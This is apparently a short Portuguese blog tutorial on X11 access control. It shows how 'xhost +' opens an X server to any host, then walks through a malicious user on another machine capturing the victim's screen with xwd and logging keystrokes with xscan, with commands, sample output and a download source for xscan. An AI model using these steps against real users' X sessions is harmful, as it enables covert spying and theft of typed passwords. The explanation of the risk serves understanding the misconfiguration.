Considere um usuário em 10.0.0.1 que utiliza xhost para permitir conexões de 192.168.1.3:
# xhost +192.168.1.3
192.168.1.3 being added to access control list
Agora qualquer usuário com uma conta em 192.168.1.3 pode carregar e exibir um programa X no servidor X em execução 10.0.0.1, contudo o comando a seguir ferá com que um servidor X permita que qualquer host se conecte a ele:
# xhost +
access control disabled, clients can connect from any host.
Considere um usuário malicioso em 192.168.1.3 emitindo o seguinte comando:
# xwd -display 10.0.0.1:0 -root > screenshot.xwd
Esse comando criará um arquivo de imagem chamado screenshot.xwd que conterá uma captura de tela da sessão X do usuário em 10.0.0.1.
O comando xwud pode ser utilizado para visualizar o arquivo screenshot.xwd.
# xwud -in screenshot.xwd
Agora o comando xscan pode ser utilizado para registrar em log os pressionamentos de tecla de um host remoto que emitiu o comando xhost:
# xscan 10.0.0.1
Scanning hostname 10.0.0.1 ...
Connecting to 10.0.0.1 (10.0.0.1) on port 6000...
Connected.
Host 10.0.0.1 is running x.
Starting keybord logging of host 10.0.0.1 to file
KEULOG10.0.0.1:0.0 ....
Esse comando xscan fará com que todas as teclas pressionadas pelo usuário em 10.0.0.1 sejam registradas em log do arquivo KEYLOG10.0.0.1:0:0
Você pode obter xscan em http://packetstormsecurity.org
Assinar:
Postar comentários (Atom)
Nenhum comentário:
Postar um comentário